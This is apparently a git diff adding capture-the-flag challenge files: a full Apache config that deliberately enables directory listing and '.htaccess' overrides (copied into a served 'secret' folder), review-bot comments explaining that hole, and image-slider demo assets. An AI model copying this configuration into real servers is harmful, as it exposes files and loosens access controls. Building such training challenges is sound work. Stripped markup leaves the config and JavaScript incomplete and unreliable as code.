+# /etc/init.d/apache2 or apache2ctl. Calling /usr/bin/apache2 directly will not
+# work with the default configuration.
+
+
+# Global configuration
+#
+
+#
+# ServerRoot: The top of the directory tree under which the server's
+# configuration, error, and log files are kept.
+#
+# NOTE! If you intend to place this on an NFS (or otherwise network)
+# mounted filesystem then please read the Mutex documentation (available
+# at );
+# you will save yourself a lot of trouble.
+#
+# Do NOT add a slash at the end of the directory path.
+#
+#ServerRoot "/etc/apache2"
+
+#
+# The accept serialization lock file MUST BE STORED ON A LOCAL DISK.
+#
+Mutex file:${APACHE_LOCK_DIR} default
+
+#
+# PidFile: The file in which the server should record its process
+# identification number when it starts.
+# This needs to be set in /etc/apache2/envvars
+#
+PidFile ${APACHE_PID_FILE}
+
+#
+# Timeout: The number of seconds before receives and sends time out.
+#
+Timeout 300
+
+#
+# KeepAlive: Whether or not to allow persistent connections (more than
+# one request per connection). Set to "Off" to deactivate.
+#
+KeepAlive On
+
+#
+# MaxKeepAliveRequests: The maximum number of requests to allow
+# during a persistent connection. Set to 0 to allow an unlimited amount.
+# We recommend you leave this number high, for maximum performance.
+#
+MaxKeepAliveRequests 100
+
+#
+# KeepAliveTimeout: Number of seconds to wait for the next request from the
+# same client on the same connection.
+#
+KeepAliveTimeout 5
+
+
+# These need to be set in /etc/apache2/envvars
+User ${APACHE_RUN_USER}
+Group ${APACHE_RUN_GROUP}
+
+#
+# HostnameLookups: Log the names of clients or just their IP addresses
+# e.g., www.apache.org (on) or 204.62.129.132 (off).
+# The default is off because it'd be overall better for the net if people
+# had to knowingly turn this feature on, since enabling it means that
+# each client request will result in AT LEAST one lookup request to the
+# nameserver.
+#
+HostnameLookups Off
+
+# ErrorLog: The location of the error log file.
+# If you do not specify an ErrorLog directive within a
+# container, error messages relating to that virtual host will be
+# logged here. If you *do* define an error logfile for a
+# container, that host's errors will be logged there and not here.
+#
+ErrorLog ${APACHE_LOG_DIR}/error.log
+
+#
+# LogLevel: Control the severity of messages logged to the error_log.
+# Available values: trace8, ..., trace1, debug, info, notice, warn,
+# error, crit, alert, emerg.
+# It is also possible to configure the log level for particular modules, e.g.
+# "LogLevel info ssl:warn"
+#
+LogLevel warn
+
+# Include module configuration:
+IncludeOptional mods-enabled/*.load
+IncludeOptional mods-enabled/*.conf
+
+# Include list of ports to listen on
+Include ports.conf
+
+
+# Sets the default security model of the Apache2 HTTPD server. It does
+# not allow access to the root filesystem outside of /usr/share and /var/www.
+# The former is used by web applications packaged in Debian,
+# the latter may be used for local directories served by the web server. If
+# your system is serving content from a sub-directory in /srv you must allow
+# access here, or in any related virtual host.
+
+ Options FollowSymLinks
+ AllowOverride None
+ Require all denied
+
+
+
+ AllowOverride None
+ Require all granted
+
+
+
+ Options Indexes FollowSymLinks
+ AllowOverride all
+ Require all granted
+
+
+#
+# Options Indexes FollowSymLinks
+# AllowOverride None
+# Require all granted
+#
+
+
+
+
+# AccessFileName: The name of the file to look for in each directory
+# for additional configuration directives. See also the AllowOverride
+# directive.
+#
+AccessFileName .htaccess
+
+#
+# The following lines prevent .htaccess and .htpasswd files from being
+# viewed by Web clients.
+#
+
+ Require all denied
+
+
+
+#
+# The following directives define some format nicknames for use with
+# a CustomLog directive.
+#
+# These deviate from the Common Log Format definitions in that they use %O
+# (the actual bytes sent including headers) instead of %b (the size of the
+# requested file), because the latter makes it impossible to detect partial
+# requests.
+#
+# Note that the use of %{X-Forwarded-For}i instead of %h is not recommended.
+# Use mod_remoteip instead.
+#
+LogFormat "%v:%p %h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" vhost_combined
+LogFormat "%h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" combined
+LogFormat "%h %l %u %t \"%r\" %>s %O" common
+LogFormat "%{Referer}i -> %U" referer
+LogFormat "%{User-agent}i" agent
+
+# Include of directories ignores editors' and dpkg's backup files,
+# see README.Debian for details.
+
+# Include generic snippets of statements
+IncludeOptional conf-enabled/*.conf
+
+# Include the virtual host configurations:
+IncludeOptional sites-enabled/*.conf
+
+# vim: syntax=apache ts=4 sw=4 sts=4 sr noet
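Review bot: Replacing the distribution's `/etc/apache2/apache2.conf` with this full 221-line copy (the ch048 Vagrantfile runs `cp -f /var/www/html/dir/apache2.conf /etc/apache2/`) hides which directives the challenge actually depends on. From the visible lines the only departure from the Debian default appears to be `AllowOverride all` in the block that also carries `Options Indexes FollowSymLinks`, though the container tags are missing from the page. A drop-in under `conf-enabled/` holding only that block would be easier to review and would not go stale when the packaged file changes. If the full copy stays, a comment above the block should say that `AllowOverride all` is there so that `dir/.htaccess` takes effect and that `Indexes` leaves directory listings on for that tree. An identical second copy is added as `dir/secret/apache2.conf` later in this diff, and both copies sit inside the served directory.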
diff --git a/challenges/ch048/dir/index.php b/challenges/ch048/dir/index.php
new file mode 100755
index 00000000..8b3284ed
--- /dev/null
+++ b/challenges/ch048/dir/index.php
@@ -0,0 +1,6 @@
+
+
+
+
diff --git a/challenges/ch048/dir/secret/apache2.conf b/challenges/ch048/dir/secret/apache2.conf
new file mode 100755
index 00000000..0f4885e4
--- /dev/null
+++ b/challenges/ch048/dir/secret/apache2.conf
@@ -0,0 +1,221 @@
+# This is the main Apache server configuration file. It contains the
+# configuration directives that give the server its instructions.
+# See http://httpd.apache.org/docs/2.4/ for detailed information about
+# the directives and /usr/share/doc/apache2/README.Debian about Debian specific
+# hints.
+#
+#
+# Summary of how the Apache 2 configuration works in Debian:
+# The Apache 2 web server configuration in Debian is quite different to
+# upstream's suggested way to configure the web server. This is because Debian's
+# default Apache2 installation attempts to make adding and removing modules,
+# virtual hosts, and extra configuration directives as flexible as possible, in
+# order to make automating the changes and administering the server as easy as
+# possible.
+
+# It is split into several files forming the configuration hierarchy outlined
+# below, all located in the /etc/apache2/ directory:
+#
+# /etc/apache2/
+# |-- apache2.conf
+# | `-- ports.conf
+# |-- mods-enabled
+# | |-- *.load
+# | `-- *.conf
+# |-- conf-enabled
+# | `-- *.conf
+# `-- sites-enabled
+# `-- *.conf
+#
+#
+# * apache2.conf is the main configuration file (this file). It puts the pieces
+# together by including all remaining configuration files when starting up the
+# web server.
+#
+# * ports.conf is always included from the main configuration file. It is
+# supposed to determine listening ports for incoming connections which can be
+# customized anytime.
+#
+# * Configuration files in the mods-enabled/, conf-enabled/ and sites-enabled/
+# directories contain particular configuration snippets which manage modules,
+# global configuration fragments, or virtual host configurations,
+# respectively.
+#
+# They are activated by symlinking available configuration files from their
+# respective *-available/ counterparts. These should be managed by using our
+# helpers a2enmod/a2dismod, a2ensite/a2dissite and a2enconf/a2disconf. See
+# their respective man pages for detailed information.
+#
+# * The binary is called apache2. Due to the use of environment variables, in
+# the default configuration, apache2 needs to be started/stopped with
+# /etc/init.d/apache2 or apache2ctl. Calling /usr/bin/apache2 directly will not
+# work with the default configuration.
+
+
+# Global configuration
+#
+
+#
+# ServerRoot: The top of the directory tree under which the server's
+# configuration, error, and log files are kept.
+#
+# NOTE! If you intend to place this on an NFS (or otherwise network)
+# mounted filesystem then please read the Mutex documentation (available
+# at );
+# you will save yourself a lot of trouble.
+#
+# Do NOT add a slash at the end of the directory path.
+#
+#ServerRoot "/etc/apache2"
+
+#
+# The accept serialization lock file MUST BE STORED ON A LOCAL DISK.
+#
+Mutex file:${APACHE_LOCK_DIR} default
+
+#
+# PidFile: The file in which the server should record its process
+# identification number when it starts.
+# This needs to be set in /etc/apache2/envvars
+#
+PidFile ${APACHE_PID_FILE}
+
+#
+# Timeout: The number of seconds before receives and sends time out.
+#
+Timeout 300
+
+#
+# KeepAlive: Whether or not to allow persistent connections (more than
+# one request per connection). Set to "Off" to deactivate.
+#
+KeepAlive On
+
+#
+# MaxKeepAliveRequests: The maximum number of requests to allow
+# during a persistent connection. Set to 0 to allow an unlimited amount.
+# We recommend you leave this number high, for maximum performance.
+#
+MaxKeepAliveRequests 100
+
+#
+# KeepAliveTimeout: Number of seconds to wait for the next request from the
+# same client on the same connection.
+#
+KeepAliveTimeout 5
+
+
+# These need to be set in /etc/apache2/envvars
+User ${APACHE_RUN_USER}
+Group ${APACHE_RUN_GROUP}
+
+#
+# HostnameLookups: Log the names of clients or just their IP addresses
+# e.g., www.apache.org (on) or 204.62.129.132 (off).
+# The default is off because it'd be overall better for the net if people
+# had to knowingly turn this feature on, since enabling it means that
+# each client request will result in AT LEAST one lookup request to the
+# nameserver.
+#
+HostnameLookups Off
+
+# ErrorLog: The location of the error log file.
+# If you do not specify an ErrorLog directive within a
+# container, error messages relating to that virtual host will be
+# logged here. If you *do* define an error logfile for a
+# container, that host's errors will be logged there and not here.
+#
+ErrorLog ${APACHE_LOG_DIR}/error.log
+
+#
+# LogLevel: Control the severity of messages logged to the error_log.
+# Available values: trace8, ..., trace1, debug, info, notice, warn,
+# error, crit, alert, emerg.
+# It is also possible to configure the log level for particular modules, e.g.
+# "LogLevel info ssl:warn"
+#
+LogLevel warn
+
+# Include module configuration:
+IncludeOptional mods-enabled/*.load
+IncludeOptional mods-enabled/*.conf
+
+# Include list of ports to listen on
+Include ports.conf
+
+
+# Sets the default security model of the Apache2 HTTPD server. It does
+# not allow access to the root filesystem outside of /usr/share and /var/www.
+# The former is used by web applications packaged in Debian,
+# the latter may be used for local directories served by the web server. If
+# your system is serving content from a sub-directory in /srv you must allow
+# access here, or in any related virtual host.
+
+ Options FollowSymLinks
+ AllowOverride None
+ Require all denied
+
+
+
+ AllowOverride None
+ Require all granted
+
+
+
+ Options Indexes FollowSymLinks
+ AllowOverride all
+ Require all granted
+
+
+#
+# Options Indexes FollowSymLinks
+# AllowOverride None
+# Require all granted
+#
+
+
+
+
+# AccessFileName: The name of the file to look for in each directory
+# for additional configuration directives. See also the AllowOverride
+# directive.
+#
+AccessFileName .htaccess
+
+#
+# The following lines prevent .htaccess and .htpasswd files from being
+# viewed by Web clients.
+#
+
+ Require all denied
+
+
+
+#
+# The following directives define some format nicknames for use with
+# a CustomLog directive.
+#
+# These deviate from the Common Log Format definitions in that they use %O
+# (the actual bytes sent including headers) instead of %b (the size of the
+# requested file), because the latter makes it impossible to detect partial
+# requests.
+#
+# Note that the use of %{X-Forwarded-For}i instead of %h is not recommended.
+# Use mod_remoteip instead.
+#
+LogFormat "%v:%p %h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" vhost_combined
+LogFormat "%h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" combined
+LogFormat "%h %l %u %t \"%r\" %>s %O" common
+LogFormat "%{Referer}i -> %U" referer
+LogFormat "%{User-agent}i" agent
+
+# Include of directories ignores editors' and dpkg's backup files,
+# see README.Debian for details.
+
+# Include generic snippets of statements
+IncludeOptional conf-enabled/*.conf
+
+# Include the virtual host configurations:
+IncludeOptional sites-enabled/*.conf
+
+# vim: syntax=apache ts=4 sw=4 sts=4 sr noet
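Review bot: The third access block (`Options Indexes FollowSymLinks` / `AllowOverride all` / `Require all granted`) turns on directory listings and lets any `.htaccess` file under that tree override server settings, whereas the stock form kept in the commented-out block just below it uses `AllowOverride None`. The container line for this block is not visible in this rendering, so the affected path is presumably the web root. If the listing is what the ch048 exercise needs, it is safer to keep the web root at `Options FollowSymLinks` and `AllowOverride None` and grant `Options Indexes` only in a container for the challenge directory, with a comment such as `# Directory listing enabled on purpose for challenge ch048 only`. The copy of this file that ends just above this section carries the same three lines, so the same point applies there. The config and the static assets in this commit are also added with mode 100755; 100644 is the expected mode for files that are not executed.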
diff --git a/challenges/ch048/dir/secret/images/image.jpeg b/challenges/ch048/dir/secret/images/image.jpeg
new file mode 100755
index 00000000..256eb82c
Binary files /dev/null and b/challenges/ch048/dir/secret/images/image.jpeg differ
diff --git a/challenges/ch048/dir/secret/images/its.jpg b/challenges/ch048/dir/secret/images/its.jpg
new file mode 100755
index 00000000..32432128
Binary files /dev/null and b/challenges/ch048/dir/secret/images/its.jpg differ
diff --git a/challenges/ch048/dir/secret/index.php b/challenges/ch048/dir/secret/index.php
new file mode 100755
index 00000000..a4de624c
--- /dev/null
+++ b/challenges/ch048/dir/secret/index.php
@@ -0,0 +1,53 @@
+
+
+
+
+CTF
+
+
+
As shown by the demo, the thumbnails change their active status while the main image slides, and clicking on an thumbnail will switch the main image.
+
If there are lots of thumbnails and the containing block does not have enough room to show them,
+ you can consider showing the thumbnails in multiple columns or rows by tweaking the js-image-slider.css (Example: Place thumbnail columns around slider both sides).
+ Another solution is to make the slider work together with Menucool jQuery Slider.
+ See jQuery Slideshow.
+ Let's add a semi-transparent effect to the thumbnails, and each thumbnail will get back to its full opacity when hovered over.
+ This can be easily done via the two built-in CSS class: thumb and thumb-on:
+ #thumbs .thumb img{ opacity:0.6;filter:alpha(opacity:60); }
+#thumbs .thumb-on img{ opacity:1;filter:alpha(opacity:100);}
+
And there you have it!
+
+
If there are lots of thumbnails and the containing block does not have enough room to show them,
+ you can consider showing the thumbnails in multiple columns or rows by tweaking the js-image-slider.css.
+ Another solution is to make the slider work together with Menucool jQuery Slider.
+ See jQuery Slideshow.
If your web page loads the slider markup dynamically (ajax, appendChild, etc.), or you want to update the slider items on the fly, you can use the slider's reload function:
+ imageSlider.reload();
+
+ The reload is the slider's built-in function that will help:
+
+
Load on demand - Populate slider dynamically by client event or AJAX
+
Adding/Changing items on the fly to the slider
+
+
View the source of this page for the sample code.
+
This demo contains no advanced features. It is free to use.
You'll see thumbnail previews when hovering on pagination bullets in the demo. The thumbnail previews are created by the
+ slider's built-in function, thumbnailPreview, with the assistance of the
+ Menucool Tooltip widget.
This demo has not used the slider's advanced features, hence it does not require slider license. However, a Tooltip license is required for using the tooltip widget to preview thumbnails.
+ If you have also included slider's advanced features, slider license is also required.
+
+
+
diff --git a/challenges/newchallenge4/inside/Slider/jsImgSlider/generic.css b/challenges/newchallenge4/inside/Slider/jsImgSlider/generic.css
new file mode 100755
index 00000000..701cc322
--- /dev/null
+++ b/challenges/newchallenge4/inside/Slider/jsImgSlider/generic.css
@@ -0,0 +1,23 @@
+
+/* For generic page styles. Not for sliders. */
+
+body {background:#F6F6F6;font:normal 0.9em Arial; margin:0; padding:0; padding-bottom:60px;}
+h2 {display:inline;}
+.div1, .div2 {width:700px;margin:0 auto;}
+.div1 {margin-top:30px;margin-bottom:60px;text-align:center;line-height:20px;}
+.div1 P {font-size:18px;}
+.div1 a, .div2 a {color:#07C; }
+.div1 a {margin:0 8px;}
+.div1 a.current {color:black; text-decoration:none;}
+.div2 {margin-top:70px;}
+.div2 li {padding-top:6px;padding-bottom:6px;}
+.green {color:Green;}
+.cn {font-family: "Courier New", Georgia;}
+#status {display:inline-block; margin-left:26px;line-height:50px;height:50px;vertical-align:middle;}
+
+.code
+{
+ border: dashed 1px #BCBCCB; padding:8px 12px; background-color: #F3F3F9; white-space:pre; font-family:"Courier New", Georgia;
+ font-size:12px; margin:6px 0;overflow:auto;
+}
+
diff --git a/challenges/newchallenge4/inside/Slider/jsImgSlider/images/caption1.gif b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/caption1.gif
new file mode 100755
index 00000000..592343c5
Binary files /dev/null and b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/caption1.gif differ
diff --git a/challenges/newchallenge4/inside/Slider/jsImgSlider/images/caption2.gif b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/caption2.gif
new file mode 100755
index 00000000..906ba1f6
Binary files /dev/null and b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/caption2.gif differ
diff --git a/challenges/newchallenge4/inside/Slider/jsImgSlider/images/caption3.gif b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/caption3.gif
new file mode 100755
index 00000000..0686053e
Binary files /dev/null and b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/caption3.gif differ
diff --git a/challenges/newchallenge4/inside/Slider/jsImgSlider/images/caption4.gif b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/caption4.gif
new file mode 100755
index 00000000..ea347d4a
Binary files /dev/null and b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/caption4.gif differ
diff --git a/challenges/newchallenge4/inside/Slider/jsImgSlider/images/image-slider-1.jpg b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/image-slider-1.jpg
new file mode 100755
index 00000000..902b3b10
Binary files /dev/null and b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/image-slider-1.jpg differ
diff --git a/challenges/newchallenge4/inside/Slider/jsImgSlider/images/image-slider-2.jpg b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/image-slider-2.jpg
new file mode 100755
index 00000000..6d8f41bb
Binary files /dev/null and b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/image-slider-2.jpg differ
diff --git a/challenges/newchallenge4/inside/Slider/jsImgSlider/images/image-slider-3.jpg b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/image-slider-3.jpg
new file mode 100755
index 00000000..dc42c7b6
Binary files /dev/null and b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/image-slider-3.jpg differ
diff --git a/challenges/newchallenge4/inside/Slider/jsImgSlider/images/image-slider-4.jpg b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/image-slider-4.jpg
new file mode 100755
index 00000000..26572141
Binary files /dev/null and b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/image-slider-4.jpg differ
diff --git a/challenges/newchallenge4/inside/Slider/jsImgSlider/images/image-slider-5.jpg b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/image-slider-5.jpg
new file mode 100755
index 00000000..9ec2c4b2
Binary files /dev/null and b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/image-slider-5.jpg differ
diff --git a/challenges/newchallenge4/inside/Slider/jsImgSlider/images/slider-1.jpg b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/slider-1.jpg
new file mode 100755
index 00000000..df340018
Binary files /dev/null and b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/slider-1.jpg differ
diff --git a/challenges/newchallenge4/inside/Slider/jsImgSlider/images/slider-2.jpg b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/slider-2.jpg
new file mode 100755
index 00000000..0f1feb35
Binary files /dev/null and b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/slider-2.jpg differ
diff --git a/challenges/newchallenge4/inside/Slider/jsImgSlider/images/slider-3.jpg b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/slider-3.jpg
new file mode 100755
index 00000000..41f6d4bb
Binary files /dev/null and b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/slider-3.jpg differ
diff --git a/challenges/newchallenge4/inside/Slider/jsImgSlider/images/slider-4.jpg b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/slider-4.jpg
new file mode 100755
index 00000000..8f49290e
Binary files /dev/null and b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/slider-4.jpg differ
diff --git a/challenges/newchallenge4/inside/Slider/jsImgSlider/images/thumb-1.gif b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/thumb-1.gif
new file mode 100755
index 00000000..015b71af
Binary files /dev/null and b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/thumb-1.gif differ
diff --git a/challenges/newchallenge4/inside/Slider/jsImgSlider/images/thumb-2.gif b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/thumb-2.gif
new file mode 100755
index 00000000..f1c30c9d
Binary files /dev/null and b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/thumb-2.gif differ
diff --git a/challenges/newchallenge4/inside/Slider/jsImgSlider/images/thumb-3.gif b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/thumb-3.gif
new file mode 100755
index 00000000..078db6a9
Binary files /dev/null and b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/thumb-3.gif differ
diff --git a/challenges/newchallenge4/inside/Slider/jsImgSlider/images/thumb-4.gif b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/thumb-4.gif
new file mode 100755
index 00000000..0cfb4c1a
Binary files /dev/null and b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/thumb-4.gif differ
diff --git a/challenges/newchallenge4/inside/Slider/jsImgSlider/images/thumb1.jpg b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/thumb1.jpg
new file mode 100755
index 00000000..232f75e8
Binary files /dev/null and b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/thumb1.jpg differ
diff --git a/challenges/newchallenge4/inside/Slider/jsImgSlider/images/thumb2.jpg b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/thumb2.jpg
new file mode 100755
index 00000000..6f442df2
Binary files /dev/null and b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/thumb2.jpg differ
diff --git a/challenges/newchallenge4/inside/Slider/jsImgSlider/images/thumb3.jpg b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/thumb3.jpg
new file mode 100755
index 00000000..eccd6bed
Binary files /dev/null and b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/thumb3.jpg differ
diff --git a/challenges/newchallenge4/inside/Slider/jsImgSlider/images/thumb4.jpg b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/thumb4.jpg
new file mode 100755
index 00000000..2fdac268
Binary files /dev/null and b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/thumb4.jpg differ
diff --git a/challenges/newchallenge4/inside/Slider/jsImgSlider/images/thumb5.jpg b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/thumb5.jpg
new file mode 100755
index 00000000..f769e45d
Binary files /dev/null and b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/thumb5.jpg differ
diff --git a/challenges/newchallenge4/inside/Slider/jsImgSlider/themes/1/bullet.png b/challenges/newchallenge4/inside/Slider/jsImgSlider/themes/1/bullet.png
new file mode 100755
index 00000000..a638e4d6
Binary files /dev/null and b/challenges/newchallenge4/inside/Slider/jsImgSlider/themes/1/bullet.png differ
diff --git a/challenges/newchallenge4/inside/Slider/jsImgSlider/themes/1/js-image-slider.css b/challenges/newchallenge4/inside/Slider/jsImgSlider/themes/1/js-image-slider.css
new file mode 100755
index 00000000..b52d0b68
--- /dev/null
+++ b/challenges/newchallenge4/inside/Slider/jsImgSlider/themes/1/js-image-slider.css
@@ -0,0 +1,120 @@
+/* http://www.menucool.com */
+
+#sliderFrame, #sliderFrame div {
+ box-sizing: content-box;
+}
+#sliderFrame
+{
+ position:relative;
+ width:700px;
+ margin:0 auto; /*center-aligned*/
+}
+#slider, #slider div.sliderInner {
+ width:700px;
+ height:306px;/* Must be the same size as the slider images */
+}
+
+#slider {
+ background:#fff url(loading.gif) no-repeat 50% 50%;
+ position:relative;
+ margin:0 auto; /*center-aligned*/
+ transform: translate3d(0,0,0);
+ box-shadow: 0px 1px 5px #999999;
+}
+
+/* image wrapper */
+#slider a.imgLink, #slider div.video {
+ z-index:2;
+ position:absolute;
+ top:0px;left:0px;border:0;padding:0;margin:0;
+ width:100%;height:100%;
+}
+#slider .video {
+ background:transparent url(video.png) no-repeat 50% 50%;
+}
+
+/* Caption styles */
+#slider div.mc-caption-bg, #slider div.mc-caption-bg2 {
+ position:absolute;
+ width:100%;
+ height:auto;
+ padding:10px 0;/* 10px will increase the height.*/
+ left:0px; /*if the caption needs to be aligned from right, specify by right instead of left. i.e. right:20px;*/
+ bottom:0px;/*if the caption needs to be aligned from top, specify by top instead of bottom. i.e. top:150px;*/
+ z-index:3;
+ overflow:hidden;
+ font-size: 0;
+}
+#slider div.mc-caption-bg
+{
+ /* NOTE: Its opacity is to be set through the sliderOptions.captionOpacity setting in the js-image-slider.js file.*/
+ background:Black;/* or any other colors such as White, or: background:none; */
+}
+#slider div.mc-caption-bg2 {
+ background:none;
+}
+#slider div.mc-caption {
+ font: bold 14px/20px Arial;
+ color:#EEE;
+ z-index:4;
+ text-align:center;
+ background:none;
+}
+#slider div.mc-caption a {
+ color:#FB0;
+}
+#slider div.mc-caption a:hover {
+ color:#DA0;
+}
+
+
+/* ------ built-in navigation bullets wrapper ------*/
+/* Note: check themes\2\js-image-slider.css to see how to hide nav bullets */
+#slider div.navBulletsWrapper {
+ top:320px;/* Its position is relative to the #slider */
+ text-align:center;
+ background:none;
+ position:relative;
+ z-index:5;
+}
+
+/* each bullet */
+#slider div.navBulletsWrapper div
+{
+ width:11px; height:11px;
+ font-size:0;color:White;/*hide the index number in the bullet element*/
+ background:transparent url(bullet.png) no-repeat 0 0;
+ display:inline-block; *display:inline; zoom:1;
+ overflow:hidden;cursor:pointer;
+ margin:0 6px;/* set distance between each bullet*/
+}
+
+#slider div.navBulletsWrapper div.active {background-position:0 -11px;}
+
+
+/* --------- Others ------- */
+
+#slider div.loading
+{
+ width:100%; height:100%;
+ background:transparent url(loading.gif) no-repeat 50% 50%;
+ filter: alpha(opacity=60);
+ opacity:0.6;
+ position:absolute;
+ left:0;
+ top:0;
+ z-index:9;
+}
+
+#slider img, #slider>b, #slider a>b {
+ position:absolute; border:none; display:none;
+}
+
+#slider div.sliderInner {
+ overflow:hidden;
+ -webkit-transform: rotate(0.000001deg);/* fixed the Chrome not crop border-radius bug*/
+ position:absolute; top:0; left:0;
+}
+
+#slider>a, #slider video, #slider audio {display:none;}
+#slider div {-webkit-transform: translate3d(0,0,0);transform: translate3d(0,0,0);}
\ No newline at end of file
diff --git a/challenges/newchallenge4/inside/Slider/jsImgSlider/themes/1/js-image-slider.js b/challenges/newchallenge4/inside/Slider/jsImgSlider/themes/1/js-image-slider.js
new file mode 100755
index 00000000..03b55687
--- /dev/null
+++ b/challenges/newchallenge4/inside/Slider/jsImgSlider/themes/1/js-image-slider.js
@@ -0,0 +1,23 @@
+var sliderOptions=
+{
+ sliderId: "slider",
+ startSlide: 0,
+ effect: "series1",
+ effectRandom: false,
+ pauseTime: 2600,
+ transitionTime: 500,
+ slices: 12,
+ boxes: 8,
+ hoverPause: 1,
+ autoAdvance: true,
+ captionOpacity: 0.3,
+ captionEffect: "fade",
+ thumbnailsWrapperId: "thumbs",
+ m: false,
+ license: "mylicense"
+};
+
+var imageSlider=new mcImgSlider(sliderOptions);
+
+/* Menucool Javascript Image Slider v2014.9.16. Copyright www.menucool.com */
+function mcImgSlider(k){for(var T=function(a){return document.getElementById(a)},d="length",ab="getElementsByTagName",C=function(e){var a=e.childNodes,c=[];if(a)for(var b=0,f=a[d];bd?1:-1,f=Math.ceil(60*c.c/1e3),a,e=1;e<=f;e++){a=d+c.b(e/f,c.d)*j;if(h!=i)a=Math.round(a);b.push(a)}b.e=0;return b},n:function(){this.b==null&&this.p()},p:function(){this.q();var a=this;this.b=U?U(function(){a.p()}):window.setInterval(function(){a.q()},15)},q:function(){var a=this.d[d];if(a){for(var c=0;c=a.a[d])a.a.p=0}if(b<1||b>17)b=15;return b}},zb=["$1$2$3","$1$2$3","$1$24","$1$23","$1$22"],tb=function(){if(b.b!=2){b.b=1;L(s);s=null}},pb=function(){if(b.b!=2){b.b=0;if(s==null&&!b.c&&a.i)s=D(function(){m.y(m.n(b.a+1),0,1)},a.b/2)}},Ab=function(){var a=0,b=0,c;while(a-1&&typeof McVideo!=r;if(c){b=1;break}++a}return b},u=[],rb=function(b){var a=u[d];if(a)while(a--)u[a][g]=a!=b&&u[a].on==0?"thumb":"thumb thumb-on"},Cb=function(a){return a[q][h]("data-autovideo")=="true"||a[h]("data-autovideo")=="true"},Eb=function(){var f;if(a.l)f=T(a.l);if(f)for(var h=lb(f,"*"),e=0;e1){D(function(){p.e(1)},0);s=D(function(){p.y(p.n(1),0,1)},a.b+a.c)}if(a.h!=0&&!ib){f.onmouseover=tb;f.onmouseout=pb}},b:function(a){if(typeof McVideo!=r){a.onclick=function(){return this.aP?false:m.d(this)};McVideo.register(a,this)}},A:function(a){if(typeof a.aP===r){var b=a[h]("data-autovideo");if(b=="true")a.aP=true;else if(b=="1")a.aP=1;else a.aP=0}},d:function(c){L(s);s=null;var a=McVideo.play(c,v,B,this.Id);if(a||ib)b.b=2;return false},f:function(){S=A("navBulletsWrapper");for(var i=[],a=0;a"+(a+1)+"
+
+
diff --git a/challenges/newchallenge4/inside/newicons/1421020759_internt_web_technology-08-128.png b/challenges/newchallenge4/inside/newicons/1421020759_internt_web_technology-08-128.png
new file mode 100755
index 00000000..25423b60
Binary files /dev/null and b/challenges/newchallenge4/inside/newicons/1421020759_internt_web_technology-08-128.png differ
diff --git a/challenges/newchallenge4/inside/newicons/1421020820_internt_web_technology-14-64.png b/challenges/newchallenge4/inside/newicons/1421020820_internt_web_technology-14-64.png
new file mode 100755
index 00000000..51f91746
Binary files /dev/null and b/challenges/newchallenge4/inside/newicons/1421020820_internt_web_technology-14-64.png differ
diff --git a/challenges/newchallenge4/inside/newicons/1421020862_internt_web_technology-13-48.png b/challenges/newchallenge4/inside/newicons/1421020862_internt_web_technology-13-48.png
new file mode 100755
index 00000000..bb81ab4c
Binary files /dev/null and b/challenges/newchallenge4/inside/newicons/1421020862_internt_web_technology-13-48.png differ
diff --git a/challenges/newchallenge4/inside/newicons/1421021091_map-128.png b/challenges/newchallenge4/inside/newicons/1421021091_map-128.png
new file mode 100755
index 00000000..1d47948e
Binary files /dev/null and b/challenges/newchallenge4/inside/newicons/1421021091_map-128.png differ
diff --git a/challenges/newchallenge4/inside/newicons/fb24_1.png b/challenges/newchallenge4/inside/newicons/fb24_1.png
new file mode 100755
index 00000000..7a61b287
Binary files /dev/null and b/challenges/newchallenge4/inside/newicons/fb24_1.png differ
diff --git a/challenges/newchallenge4/inside/newicons/fb24_2.png b/challenges/newchallenge4/inside/newicons/fb24_2.png
new file mode 100755
index 00000000..128d9a0f
Binary files /dev/null and b/challenges/newchallenge4/inside/newicons/fb24_2.png differ
